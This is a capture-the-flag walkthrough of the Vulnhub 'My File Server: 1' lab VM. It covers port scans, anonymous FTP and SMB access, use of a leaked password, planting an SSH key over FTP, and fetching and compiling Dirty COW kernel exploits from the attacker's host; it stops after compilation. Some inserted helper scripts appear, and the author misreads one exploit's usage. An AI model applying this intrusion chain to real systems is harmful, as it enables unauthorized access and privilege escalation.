Vulnhub box walkthrough: MY FILE SERVER: 1

MY FILE SERVER: 1

  • nmap scan
    • Port scan
    • Service scan
    • Vulnerability scan
    • Choosing an attack path
  • 21/2121 ftp
  • 445 samba
  • 2049/20048 nfs
  • 80 http
    • Directory brute force
  • Getting a foothold
  • Privilege escalation
    • 40611
    • 40847
  • Getting the flag

Target link: https://www.vulnhub.com/entry/my-file-server-1,432/
Target IP: 192.168.54.33
Kali IP: 192.168.54.128

nmap scan

Port scan

# Nmap 7.93 scan initiated Sun Jun 11 14:23:28 2023 as: nmap -sT --min-rate 10000 -p- -oN nmap/ports 192.168.54.33
Nmap scan report for 192.168.54.33
Host is up (0.0050s latency).
Not shown: 64504 filtered tcp ports (no-response), 19 filtered tcp ports (host-unreach), 1004 closed tcp ports (conn-refused)
PORT      STATE SERVICE
21/tcp    open  ftp
22/tcp    open  ssh
80/tcp    open  http
111/tcp   open  rpcbind
445/tcp   open  microsoft-ds
2049/tcp  open  nfs
2121/tcp  open  ccproxy-ftp
20048/tcp open  mountd
MAC Address: 00:0C:29:42:CC:6A (VMware)

# Nmap done at Sun Jun 11 14:23:41 2023 -- 1 IP address (1 host up) scanned in 13.33 seconds
# Nmap 7.93 scan initiated Sun Jun 11 14:24:25 2023 as: nmap -sU --min-rate 10000 --top-ports 20 -oN nmap/udp 192.168.54.33
Nmap scan report for 192.168.54.33
Host is up (0.00035s latency).

PORT      STATE         SERVICE
53/udp    open|filtered domain
67/udp    open|filtered dhcps
68/udp    open|filtered dhcpc
69/udp    filtered      tftp
123/udp   open|filtered ntp
135/udp   open|filtered msrpc
137/udp   open|filtered netbios-ns
138/udp   open|filtered netbios-dgm
139/udp   open|filtered netbios-ssn
161/udp   open|filtered snmp
162/udp   open|filtered snmptrap
445/udp   filtered      microsoft-ds
500/udp   filtered      isakmp
514/udp   open|filtered syslog
520/udp   open|filtered route
631/udp   open|filtered ipp
1434/udp  open|filtered ms-sql-m
1900/udp  open|filtered upnp
4500/udp  open|filtered nat-t-ike
49152/udp filtered      unknown
MAC Address: 00:0C:29:42:CC:6A (VMware)

# Nmap done at Sun Jun 11 14:24:25 2023 -- 1 IP address (1 host up) scanned in 0.48 seconds

Process the scan output to get the list of open ports

# yunki @ yunki in ~/vulnhub/myfileserver1 [14:27:24] 
$ grep open nmap/ports | awk -F'/' '{print$1}'| paste -sd ','
21,22,80,111,445,2049,2121,20048
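The grep/awk one-liner above works for the TCP scan, but `grep open` would also pull in the `open|filtered` lines a UDP scan produces. The following is an added example (not from the original write-up) that only keeps ports whose state is exactly `open`; the sample files are constructed to mimic the two scans above.

```shell
# open_ports <file> [proto]: print ports in state "open" from nmap -oN output
# as a comma-separated list. proto defaults to tcp; pass udp for UDP scans.
open_ports() {
    file="$1"
    proto="${2:-tcp}"
    awk -v proto="$proto" '
        # Port lines look like "21/tcp    open  ftp": the first field is
        # port/proto, the second is the state. Require the state to be
        # exactly "open" so "open|filtered" and "filtered" are skipped.
        $1 ~ ("^[0-9]+/" proto "$") && $2 == "open" {
            split($1, p, "/")
            ports = ports (ports == "" ? "" : ",") p[1]
        }
        END { print ports }
    ' "$file"
}

# Constructed sample of the TCP scan, including the header lines nmap writes.
cat > /tmp/ports.sample <<'EOF'
# Nmap 7.93 scan initiated ... as: nmap -sT --min-rate 10000 -p- -oN nmap/ports 192.168.54.33
PORT      STATE SERVICE
21/tcp    open  ftp
22/tcp    open  ssh
80/tcp    open  http
111/tcp   open  rpcbind
445/tcp   open  microsoft-ds
2049/tcp  open  nfs
2121/tcp  open  ccproxy-ftp
20048/tcp open  mountd
EOF

# Constructed sample of the UDP top-ports scan: nothing here is confirmed open,
# so a plain "grep open" would have produced a misleading port list.
cat > /tmp/udp.sample <<'EOF'
PORT      STATE         SERVICE
53/udp    open|filtered domain
69/udp    filtered      tftp
161/udp   open|filtered snmp
EOF

open_ports /tmp/ports.sample        # 21,22,80,111,445,2049,2121,20048
open_ports /tmp/udp.sample udp      # prints an empty line
```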

Service scan

# Nmap 7.93 scan initiated Sun Jun 11 14:29:33 2023 as: nmap -sT -sVC -O -p21,22,80,111,445,2049,2121,20048 -oN nmap/details 192.168.54.33
Nmap scan report for 192.168.54.33
Host is up (0.00045s latency).

PORT      STATE SERVICE     VERSION
21/tcp    open  ftp         vsftpd 3.0.2
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_drwxrwxrwx    3 0        0              16 Feb 19  2020 pub [NSE: writeable]
| ftp-syst: 
|   STAT: 
| FTP server status:
|      Connected to ::ffff:192.168.54.128
|      Logged in as ftp
|      TYPE: ASCII
|      No session bandwidth limit
|      Session timeout in seconds is 300
|      Control connection is plain text
|      Data connections will be plain text
|      At session startup, client count was 4
|      vsFTPd 3.0.2 - secure, fast, stable
|_End of status
22/tcp    open  ssh         OpenSSH 7.4 (protocol 2.0)
| ssh-hostkey: 
|   2048 75fa37d1624a15877e2183b92fff0493 (RSA)
|   256 b8db2ccae270c3eb9aa8cc0ea21c686b (ECDSA)
|_  256 66a31b55cac2518441217f774045d49f (ED25519)
80/tcp    open  http        Apache httpd 2.4.6 ((CentOS))
| http-methods: 
|_  Potentially risky methods: TRACE
|_http-title: My File Server
|_http-server-header: Apache/2.4.6 (CentOS)
111/tcp   open  rpcbind     2-4 (RPC #100000)
| rpcinfo: 
|   program version    port/proto  service
|   100000  2,3,4        111/tcp   rpcbind
|   100000  2,3,4        111/udp   rpcbind
|   100000  3,4          111/tcp6  rpcbind
|   100000  3,4          111/udp6  rpcbind
|   100003  3,4         2049/tcp   nfs
|   100003  3,4         2049/tcp6  nfs
|   100003  3,4         2049/udp   nfs
|   100003  3,4         2049/udp6  nfs
|   100005  1,2,3      20048/tcp   mountd
|   100005  1,2,3      20048/tcp6  mountd
|   100005  1,2,3      20048/udp   mountd
|   100005  1,2,3      20048/udp6  mountd
|   100021  1,3,4      34309/tcp6  nlockmgr
|   100021  1,3,4      39139/tcp   nlockmgr
|   100021  1,3,4      49696/udp   nlockmgr
|   100021  1,3,4      60509/udp6  nlockmgr
|   100024  1          34732/tcp6  status
|   100024  1          43955/tcp   status
|   100024  1          45560/udp   status
|   100024  1          57303/udp6  status
|   100227  3           2049/tcp   nfs_acl
|   100227  3           2049/tcp6  nfs_acl
|   100227  3           2049/udp   nfs_acl
|_  100227  3           2049/udp6  nfs_acl
445/tcp   open  netbios-ssn Samba smbd 4.9.1 (workgroup: SAMBA)
2049/tcp  open  nfs_acl     3 (RPC #100227)
2121/tcp  open  ftp         ProFTPD 1.3.5
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_Can't get directory listing: ERROR
20048/tcp open  mountd      1-3 (RPC #100005)
MAC Address: 00:0C:29:42:CC:6A (VMware)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 2.6.X|3.X
OS CPE: cpe:/o:linux:linux_kernel:2.6 cpe:/o:linux:linux_kernel:3
OS details: Linux 2.6.32 - 3.10, Linux 2.6.32 - 3.13, Linux 3.10, Linux 3.4 - 3.10
Network Distance: 1 hop
Service Info: Host: FILESERVER; OS: Unix

Host script results:
|_clock-skew: mean: 6h10m01s, deviation: 3h10m28s, median: 7h59m58s
| smb2-time: 
|   date: 2023-06-11T14:29:43
|_  start_date: N/A
| smb2-security-mode: 
|   311: 
|_    Message signing enabled but not required
| smb-security-mode: 
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
| smb-os-discovery: 
|   OS: Windows 6.1 (Samba 4.9.1)
|   Computer name: localhost
|   NetBIOS computer name: FILESERVER\x00
|   Domain name: \x00
|   FQDN: localhost
|_  System time: 2023-06-11T19:59:47+05:30

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Sun Jun 11 14:29:54 2023 -- 1 IP address (1 host up) scanned in 21.59 seconds

Vulnerability scan

# Nmap 7.93 scan initiated Sun Jun 11 14:30:11 2023 as: nmap --script=vuln -p21,22,80,111,445,2049,2121,20048 -oN nmap/vuln 192.168.54.33
Nmap scan report for 192.168.54.33
Host is up (0.00029s latency).

PORT      STATE SERVICE
21/tcp    open  ftp
22/tcp    open  ssh
80/tcp    open  http
|_http-csrf: Couldn't find any CSRF vulnerabilities.
|_http-dombased-xss: Couldn't find any DOM based XSS.
| http-enum: 
|_  /icons/: Potentially interesting folder w/ directory listing
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
|_http-trace: TRACE is enabled
111/tcp   open  rpcbind
445/tcp   open  microsoft-ds
2049/tcp  open  nfs
2121/tcp  open  ccproxy-ftp
20048/tcp open  mountd
MAC Address: 00:0C:29:42:CC:6A (VMware)

Host script results:
|_smb-vuln-ms10-054: false
| smb-vuln-regsvc-dos: 
|   VULNERABLE:
|   Service regsvc in Microsoft Windows systems vulnerable to denial of service
|     State: VULNERABLE
|       The service regsvc in Microsoft Windows 2000 systems is vulnerable to denial of service caused by a null deference
|       pointer. This script will crash the service if it is vulnerable. This vulnerability was discovered by Ron Bowes
|       while working on smb-enum-sessions.
|_          
|_smb-vuln-ms10-061: false

# Nmap done at Sun Jun 11 14:30:54 2023 -- 1 IP address (1 host up) scanned in 42.80 seconds

Choosing an attack path

Looking over the services:

  • Port 21, ftp, anonymous login allowed, writable.
  • Port 22, OpenSSH.
  • Port 80, Apache; the operating system is CentOS.
  • Port 111, rpc.
  • Port 445, samba over tcp.
  • Port 2049, nfs, which matches the rpcinfo details seen on port 111.
  • Port 2121, ftp, anonymous login allowed.
  • Port 20048, mountd for the nfs export, again matching port 111.
    In short: 21, samba, nfs, 80....

21/2121 ftp

$ ftp 192.168.54.33
Connected to 192.168.54.33.
220 (vsFTPd 3.0.2)
Name (192.168.54.33:yunki): anonymous
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
drwxrwxrwx    3 0        0              16 Feb 19  2020 pub
226 Directory send OK.
ftp> cd pub
250 Directory successfully changed.
ftp> ls
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
drwxr-xr-x    9 0        0            4096 Feb 19  2020 log
226 Directory send OK.
ftp> cd log
250 Directory successfully changed.
ftp> ls
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
drwxr-xr-x    2 0        0            4096 Feb 19  2020 anaconda
drwxr-x---    2 0        0              22 Feb 19  2020 audit
-rw-r--r--    1 0        0            7033 Feb 19  2020 boot.log
-rw-------    1 0        0           10752 Feb 19  2020 btmp
-rw-r--r--    1 0        0            9161 Feb 19  2020 cron
-rw-r--r--    1 0        0           31971 Feb 19  2020 dmesg
-rw-r--r--    1 0        0           31971 Feb 19  2020 dmesg.old
drwxr-xr-x    2 0        0               6 Feb 19  2020 glusterfs
drwx------    2 0        0              39 Feb 19  2020 httpd
-rw-r--r--    1 0        0          292584 Feb 19  2020 lastlog
-rw-------    1 0        0            3764 Feb 19  2020 maillog
-rw-------    1 0        0         1423423 Feb 19  2020 messages
drwx------    2 0        0               6 Feb 19  2020 ppp
drwx------    4 0        0              43 Feb 19  2020 samba
-rw-------    1 0        0           63142 Feb 19  2020 secure
-rw-------    1 0        0               0 Feb 19  2020 spooler
-rw-------    1 0        0               0 Feb 19  2020 tallylog
drwxr-xr-x    2 0        0              22 Feb 19  2020 tuned
-rw-r--r--    1 0        0           58752 Feb 19  2020 wtmp
-rw-------    1 0        0             100 Feb 19  2020 xferlog
-rw-------    1 0        0           18076 Feb 19  2020 yum.log
226 Directory send OK.

Looking through this listing, the secure file is the most interesting, but we have no permission to read it for now. Check port 2121.

$ ftp 192.168.54.33 2121
Connected to 192.168.54.33.
220 ProFTPD 1.3.5 Server (ProFTPD Default Installation) [192.168.54.33]
Name (192.168.54.33:yunki): anonymous
331 Anonymous login ok, send your complete email address as your password
Password:
230 Anonymous access granted, restrictions apply
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls
200 PORT command successful
150 Opening ASCII mode data connection for file list
drwxrwxrwx   3 root     root           16 Feb 19  2020 pub
226 Transfer complete
ftp> cd pub
250 CWD command successful
ftp> ls
200 PORT command successful
150 Opening ASCII mode data connection for file list
drwxr-xr-x   9 root     root         4096 Feb 19  2020 log
226 Transfer complete
ftp> cd log
250 CWD command successful
ftp> ls
200 PORT command successful
150 Opening ASCII mode data connection for file list
drwxr-xr-x   2 root     root         4096 Feb 19  2020 anaconda
drwxr-x---   2 root     root           22 Feb 19  2020 audit
-rw-r--r--   1 root     root         7033 Feb 19  2020 boot.log
-rw-------   1 root     root        10752 Feb 19  2020 btmp
-rw-r--r--   1 root     root         9161 Feb 19  2020 cron
-rw-r--r--   1 root     root        31971 Feb 19  2020 dmesg
-rw-r--r--   1 root     root        31971 Feb 19  2020 dmesg.old
drwxr-xr-x   2 root     root            6 Feb 19  2020 glusterfs
drwx------   2 root     root           39 Feb 19  2020 httpd
-rw-r--r--   1 root     root       292584 Feb 19  2020 lastlog
-rw-------   1 root     root         3764 Feb 19  2020 maillog
-rw-------   1 root     root      1423423 Feb 19  2020 messages
drwx------   2 root     root            6 Feb 19  2020 ppp
drwx------   4 root     root           43 Feb 19  2020 samba
-rw-------   1 root     root        63142 Feb 19  2020 secure
-rw-------   1 root     root            0 Feb 19  2020 spooler
-rw-------   1 root     root            0 Feb 19  2020 tallylog
drwxr-xr-x   2 root     root           22 Feb 19  2020 tuned
-rw-r--r--   1 root     root        58752 Feb 19  2020 wtmp
-rw-------   1 root     root          100 Feb 19  2020 xferlog
-rw-------   1 root     root        18076 Feb 19  2020 yum.log
226 Transfer complete
ftp> exit
221 Goodbye.

Same as port 21, nothing useful here. On to the next one.

445 samba

$ sudo smbmap -H 192.168.54.33          
[+] IP: 192.168.54.33:445       Name: 192.168.54.33                                     
        Disk                                                    Permissions     Comment
        ----                                                    -----------     -------
        print$                                                  NO ACCESS       Printer Drivers
        smbdata                                                 READ, WRITE     smbdata
        smbuser                                                 NO ACCESS       smbuser
        IPC$                                                    NO ACCESS       IPC Service (Samba 4.9.1)
# yunki @ yunki in ~/vulnhub/myfileserver1 [15:27:56] 
$ smbclient //192.168.54.33/smbdata
Password for [WORKGROUP\yunki]:
Anonymous login successful
Try "help" to get a list of possible commands.
smb: \> ls -liah
NT_STATUS_NO_SUCH_FILE listing \-liah
smb: \> ls
  .                                   D        0  Sun Jun 11 23:01:12 2023
  ..                                  D        0  Tue Feb 18 19:47:54 2020
  anaconda                            D        0  Tue Feb 18 19:48:15 2020
  audit                               D        0  Tue Feb 18 19:48:15 2020
  boot.log                            N     6120  Tue Feb 18 19:48:16 2020
  btmp                                N      384  Tue Feb 18 19:48:16 2020
  cron                                N     4813  Tue Feb 18 19:48:16 2020
  dmesg                               N    31389  Tue Feb 18 19:48:16 2020
  dmesg.old                           N    31389  Tue Feb 18 19:48:16 2020
  glusterfs                           D        0  Tue Feb 18 19:48:16 2020
  lastlog                             N   292292  Tue Feb 18 19:48:16 2020
  maillog                             N     1982  Tue Feb 18 19:48:16 2020
  messages                            N   684379  Tue Feb 18 19:48:17 2020
  ppp                                 D        0  Tue Feb 18 19:48:17 2020
  samba                               D        0  Tue Feb 18 19:48:17 2020
  secure                              N    11937  Tue Feb 18 19:48:17 2020
  spooler                             N        0  Tue Feb 18 19:48:17 2020
  tallylog                            N        0  Tue Feb 18 19:48:17 2020
  tuned                               D        0  Tue Feb 18 19:48:17 2020
  wtmp                                N    25728  Tue Feb 18 19:48:17 2020
  xferlog                             N      100  Tue Feb 18 19:48:17 2020
  yum.log                             N    10915  Tue Feb 18 19:48:17 2020
  sshd_config                         N     3906  Wed Feb 19 15:46:38 2020

                19976192 blocks of size 1024. 18284616 blocks available
smb: \> get secure
getting file \secure of size 11937 as secure (685.7 KiloBytes/sec) (average 685.7 KiloBytes/sec)
smb: \> get sshd_config
getting file \sshd_config of size 3906 as sshd_config (762.9 KiloBytes/sec) (average 703.3 KiloBytes/sec)
smb: \> exit

# yunki @ yunki in ~/vulnhub/myfileserver1 [15:28:14] 
$ cat secure      
...
# yunki @ yunki in ~/vulnhub/myfileserver1 [15:28:18] 
$ cat sshd_config
...

Reading the secure file reveals the following information.
Write it to cred.txt

$ echo 'smbuser:chauthtok' >> cred.txt

Trying this credential against the services: FTP on port 21 fails, FTP on port 2121 fails, SSH on port 22 fails.
Reading the sshd_config file shows the following.
[Figure 1: screenshot of sshd_config]
Only key-based login is allowed, so logging in over SSH with a password is not possible.

2049/20048 nfs

$ showmount -e 192.168.54.33       
Export list for 192.168.54.33:
/smbdata 192.168.56.0/24

This shows an smbdata export, but it is only accessible from the 192.168.56.0/24 range, and our environment is on the 54 subnet. Rather than reconfiguring the network now, try the other leads first and come back here if nothing else pans out.

80 http

Opening the web page shows just "My File Server" and nothing else. Straight to directory brute forcing.

Directory brute force

$ sudo gobuster dir --wordlist /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x zip,html,rar,txt,sql,jsp,php --url http://192.168.54.33/ --no-error| tee gobuster.log
===============================================================
Gobuster v3.5
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://192.168.54.33/
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.5
[+] Extensions:              php,zip,html,rar,txt,sql,jsp
[+] Timeout:                 10s
===============================================================
2023/06/11 15:41:29 Starting gobuster in directory enumeration mode
===============================================================
/index.html           (Status: 200) [Size: 174]
/.html                (Status: 403) [Size: 207]
/readme.txt           (Status: 200) [Size: 25]
/.html                (Status: 403) [Size: 207]
Progress: 1761220 / 1764488 (99.81%)
===============================================================
2023/06/11 15:45:23 Finished
===============================================================
Progress: 1764480 / 1764488 (100.00%)

Found readme.txt; visiting it reveals a password, which goes into cred.txt.

# yunki @ yunki in ~/vulnhub/myfileserver1 [15:43:58] C:130
$ curl http://192.168.54.33/readme.txt
My Password is
rootroot1

# yunki @ yunki in ~/vulnhub/myfileserver1 [15:44:09] 
$ echo rootroot1 >> cred.txt

# yunki @ yunki in ~/vulnhub/myfileserver1 [15:44:25] 
$ cat cred.txt                        
smbuser:chauthtok
rootroot1

Since SSH password login is not possible, retry this password against the ftp/smb services.

Getting a foothold

Logging in to the FTP service as smbuser:rootroot1 works, and the working directory is /home/smbuser.

# yunki @ yunki in ~/vulnhub/myfileserver1 [15:46:24] 
$ ftp 192.168.54.33     
Connected to 192.168.54.33.
220 (vsFTPd 3.0.2)
Name (192.168.54.33:yunki): smbuser
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
226 Directory send OK.
ftp> pwd
257 "/home/smbuser"

The idea here is to generate a key pair with ssh-keygen, upload the public key to ~/.ssh/authorized_keys under the path found above, then log in with the private key. Let's try.
First generate the key pair with ssh-keygen.

# yunki @ yunki in ~/vulnhub/myfileserver1 [15:48:41] 
$ sudo ssh-keygen                       
[sudo] yunki 的密码:
Generating public/private rsa key pair.
Enter file in which to save the key (/root/.ssh/id_rsa): test
Enter passphrase (empty for no passphrase): 
Enter same passphrase again: 
Your identification has been saved in test
Your public key has been saved in test.pub
The key fingerprint is:
SHA256:g8VyEwz68HDLaiwG1bhiWpvVUXZEk61+38D/W91oabo root@yunki
The key's randomart image is:
+---[RSA 3072]----+
|      .o+o=o     |
|   o . +.o...    |
|  o = + =  .     |
| . . O B ..      |
|o.o . B S.   .   |
|o+ = .   .. . ooo|
|. = +      . .=++|
| . o         +. +|
|            E. .+|
+----[SHA256]-----+

# yunki @ yunki in ~/vulnhub/myfileserver1 [15:49:03] 
$ ls
80  cred.txt  gobuster.log  linPEAS.sh  nmap  secure  sshd_config  test  test.pub

Rename it to the name required by the sshd_config file seen earlier. Reconnect over FTP, create the .ssh directory, upload the file, exit, and log in with ssh -i. Success! Foothold obtained!

# yunki @ yunki in ~/vulnhub/myfileserver1 [15:49:04] 
$ cp test.pub authorized_keys       

# yunki @ yunki in ~/vulnhub/myfileserver1 [15:49:23] 
$ ftp 192.168.54.33
Connected to 192.168.54.33.
220 (vsFTPd 3.0.2)
Name (192.168.54.33:yunki): smbuser
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> pwd
257 "/home/smbuser"
ftp> mkdir .ssh
257 "/home/smbuser/.ssh" created
ftp> cd .ssh
250 Directory successfully changed.
ftp> put authorized_keys 
local: authorized_keys remote: authorized_keys
200 PORT command successful. Consider using PASV.
150 Ok to send data.
226 Transfer complete.
564 bytes sent in 0.00 secs (4.7599 MB/s)
ftp> exit
221 Goodbye.

# yunki @ yunki in ~/vulnhub/myfileserver1 [15:49:45] 
$ sudo ssh -i test [email protected]
   ##############################################################################################
   #                                      Armour Infosec                                        #
   #                         --------- www.armourinfosec.com ------------                       #
   #                                    My File Server - 1                                      #
   #                               Designed By  :- Akanksha Sachin Verma                        #
   #                               Twitter      :- @akankshavermasv                             #
   ##############################################################################################

Last login: Thu Feb 20 16:42:21 2020
[smbuser@fileserver ~]$ whoami
smbuser

Privilege escalation

[smbuser@fileserver ~]$ whoami
smbuser
[smbuser@fileserver ~]$ ip a
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN 
    link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
    inet 127.0.0.1/8 scope host lo
       valid_lft forever preferred_lft forever
    inet6 ::1/128 scope host 
       valid_lft forever preferred_lft forever
2: ens32: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc pfifo_fast state UP qlen 1000
    link/ether 00:0c:29:42:cc:6a brd ff:ff:ff:ff:ff:ff
    inet 192.168.54.33/24 brd 192.168.54.255 scope global dynamic ens32
       valid_lft 1545sec preferred_lft 1545sec
    inet6 fe80::20c:29ff:fe42:cc6a/64 scope link 
       valid_lft forever preferred_lft forever
[smbuser@fileserver ~]$ uname -a
Linux fileserver 3.10.0-229.el7.x86_64 #1 SMP Fri Mar 6 11:36:42 UTC 2015 x86_64 x86_64 x86_64 GNU/Linux

The kernel version is quite old, so a kernel exploit for privilege escalation is worth trying. First upload linPEAS.sh to gather information.
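Before reaching for an exploit, a defender (or a tester writing a report) wants a reproducible way to tell whether a RHEL/CentOS 7 kernel like 3.10.0-229.el7 predates the CVE-2016-5195 fix. The following is an added example, not code from the write-up: it assumes the first fixed RHEL 7 build is 3.10.0-327.36.3.el7 (RHSA-2016:2098), which should be verified against the advisory before use in an inventory script.

```shell
# Assumption: first RHEL 7 kernel build carrying the CVE-2016-5195 fix.
FIXED_BUILD="327.36.3"

# vercmp a b: print -1, 0 or 1 comparing dotted numeric build strings,
# treating missing components as 0 (so 327 < 327.36.3).
vercmp() {
    awk -v a="$1" -v b="$2" 'BEGIN {
        na = split(a, x, "."); nb = split(b, y, ".")
        n = (na > nb) ? na : nb
        for (i = 1; i <= n; i++) {
            xi = (i in x) ? x[i] + 0 : 0
            yi = (i in y) ? y[i] + 0 : 0
            if (xi < yi) { print -1; exit }
            if (xi > yi) { print 1; exit }
        }
        print 0
    }'
}

# dirtycow_patched <uname -r string>: return 0 if the build number is at or
# past FIXED_BUILD, 1 if it is older, 2 if the kernel line is not modelled.
dirtycow_patched() {
    rel="$1"
    case "$rel" in
        3.10.0-*.el7*) ;;    # only the RHEL/CentOS 7 kernel line is handled
        *) echo "unknown kernel line: $rel" >&2; return 2 ;;
    esac
    build="${rel#3.10.0-}"      # 229.el7.x86_64
    build="${build%%.el7*}"     # 229
    [ "$(vercmp "$build" "$FIXED_BUILD")" -ge 0 ]
}

# Constructed inputs: the target's own kernel, the assumed fix build, and a
# much later build. On a live host use: dirtycow_patched "$(uname -r)"
for k in 3.10.0-229.el7.x86_64 3.10.0-327.36.3.el7.x86_64 3.10.0-1160.el7.x86_64; do
    if dirtycow_patched "$k"; then
        echo "$k: patched"
    else
        echo "$k: VULNERABLE (older than $FIXED_BUILD)"
    fi
done
```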

kali

# yunki @ yunki in ~/vulnhub/myfileserver1 [15:56:16] 
$ ls linPEAS.sh 
linPEAS.sh

# yunki @ yunki in ~/vulnhub/myfileserver1 [15:56:26] 
$ php -S 0:80
[Sun Jun 11 15:56:28 2023] PHP 7.4.15 Development Server (http://0:80) started
[Sun Jun 11 15:56:40 2023] 192.168.54.33:60229 Accepted
[Sun Jun 11 15:56:40 2023] 192.168.54.33:60229 [200]: (null) /linPEAS.sh
[Sun Jun 11 15:56:40 2023] 192.168.54.33:60229 Closing

target

[smbuser@fileserver ~]$ cd /tmp
[smbuser@fileserver tmp]$ ls
systemd-private-c647a2df6aae4899bee3bbf03ef953ca-httpd.service-1GFcXT
[smbuser@fileserver tmp]$ wget http://192.168.54.128/linPEAS.sh
--2023-06-11 21:00:34--  http://192.168.54.128/linPEAS.sh
正在连接 192.168.54.128:80... 已连接。
已发出 HTTP 请求,正在等待回应... 200 OK
长度:828172 (809K) [application/x-sh]
正在保存至: “linPEAS.sh”

100%[===============================================================================================================>] 828,172     --.-K/s 用时 0.03s   

2023-06-11 21:00:34 (30.8 MB/s) - 已保存 “linPEAS.sh” [828172/828172])

[smbuser@fileserver tmp]$ chmod +x linPEAS.sh 
[smbuser@fileserver tmp]$ ./linPEAS.sh 

Looking through the results, the useful kernel privilege-escalation entries are listed here.
[Figure 2: linPEAS kernel exploit suggestions]
Try these two first: download them on Kali, then start a web server on Kali.
kali

# yunki @ yunki in ~/vulnhub/myfileserver1 [16:00:18] C:130
$ searchsploit -m 40611 40847           
  Exploit: Linux Kernel 2.6.22 < 3.9 - 'Dirty COW' /proc/self/mem Race Condition (Write Access Method)
      URL: https://www.exploit-db.com/exploits/40611
     Path: /usr/share/exploitdb/exploits/linux/local/40611.c
    Codes: CVE-2016-5195
 Verified: True
File Type: C source, ASCII text
Copied to: /home/yunki/vulnhub/myfileserver1/40611.c


  Exploit: Linux Kernel 2.6.22 < 3.9 - 'Dirty COW /proc/self/mem' Race Condition Privilege Escalation (/etc/passwd Method)
      URL: https://www.exploit-db.com/exploits/40847
     Path: /usr/share/exploitdb/exploits/linux/local/40847.cpp
    Codes: CVE-2016-5195
 Verified: True
File Type: C++ source, ASCII text
Copied to: /home/yunki/vulnhub/myfileserver1/40847.cpp



# yunki @ yunki in ~/vulnhub/myfileserver1 [16:00:35] 
$ php -S 0:80
[Sun Jun 11 16:00:51 2023] PHP 7.4.15 Development Server (http://0:80) started
[Sun Jun 11 16:01:07 2023] 192.168.54.33:60235 Accepted
[Sun Jun 11 16:01:07 2023] 192.168.54.33:60235 [200]: (null) /40611.c
[Sun Jun 11 16:01:07 2023] 192.168.54.33:60235 Closing
[Sun Jun 11 16:01:16 2023] 192.168.54.33:60236 Accepted
[Sun Jun 11 16:01:16 2023] 192.168.54.33:60236 [200]: (null) /40847.cpp
[Sun Jun 11 16:01:16 2023] 192.168.54.33:60236 Closing

40611

[smbuser@fileserver tmp]$ wget http://192.168.54.128/40611.c
--2023-06-11 21:05:01--  http://192.168.54.128/40611.c
正在连接 192.168.54.128:80... 已连接。
已发出 HTTP 请求,正在等待回应... 200 OK
长度:2821 (2.8K) [text/x-c]
正在保存至: “40611.c”

100%[===============================================================================================================>] 2,821       --.-K/s 用时 0s      

2023-06-11 21:05:01 (666 MB/s) - 已保存 “40611.c” [2821/2821])


[smbuser@fileserver tmp]$ ls
40611.c  40847.cpp  linPEAS.sh  systemd-private-c647a2df6aae4899bee3bbf03ef953ca-httpd.service-1GFcXT
[smbuser@fileserver tmp]$ head 40611.c 
/*
####################### dirtyc0w.c #######################
$ sudo -s
# echo this is not a test > foo
# chmod 0404 foo
$ ls -lah foo
-r-----r-- 1 root root 19 Oct 20 15:23 foo
$ cat foo
this is not a test
$ gcc -pthread dirtyc0w.c -o dirtyc0w


[smbuser@fileserver tmp]$ gcc -pthread 40611.c -o 40611
[smbuser@fileserver tmp]$ ls
40611  40611.c  linPEAS.sh  systemd-private-c647a2df6aae4899bee3bbf03ef953ca-httpd.service-1GFcXT
[smbuser@fileserver tmp]$ ./40611 
usage: dirtyc0w target_file new_content

From the usage hint it looks like it can only read files; try whether it can read /etc/shadow.

[smbuser@fileserver tmp]$ ./40611 
usage: dirtyc0w target_file new_content
[smbuser@fileserver tmp]$ ./40611 /etc/shadow /tmp/shadow
mmap ffffffffffffffff

 
ls
^C
[smbuser@fileserver tmp]$ ls
40611  40611.c  linPEAS.sh  systemd-private-c647a2df6aae4899bee3bbf03ef953ca-httpd.service-1GFcXT

It seems nothing was read. Failed.

40847

[smbuser@fileserver tmp]$ wget http://192.168.54.128/40847.cpp
--2023-06-11 21:05:10--  http://192.168.54.128/40847.cpp
正在连接 192.168.54.128:80... 已连接。
已发出 HTTP 请求,正在等待回应... 200 OK
长度:10212 (10.0K) [text/x-c]
正在保存至: “40847.cpp”

100%[===============================================================================================================>] 10,212      --.-K/s 用时 0s      

2023-06-11 21:05:10 (410 MB/s) - 已保存 “40847.cpp” [10212/10212])


[smbuser@fileserver tmp]$ head 40847.cpp 
// EDB-Note: Compile:   g++ -Wall -pedantic -O2 -std=c++11 -pthread -o dcow 40847.cpp -lutil
// EDB-Note: Recommended way to run:   ./dcow -s    (Will automatically do "echo 0 > /proc/sys/vm/dirty_writeback_centisecs")
//
// -----------------------------------------------------------------
// Copyright (C) 2016  Gabriele Bonacini
//
// This program is free software; you can redistribute it and/or modify
// it under the terms of the GNU General Public License as published by
// the Free Software Foundation; either version 3 of the License, or
// (at your option) any later version.


[smbuser@fileserver tmp]$ g++ -Wall -pedantic -O2 -std=c++11 -pthread -o dcow 40847.cpp -lutil
[smbuser@fileserver tmp]$ ls
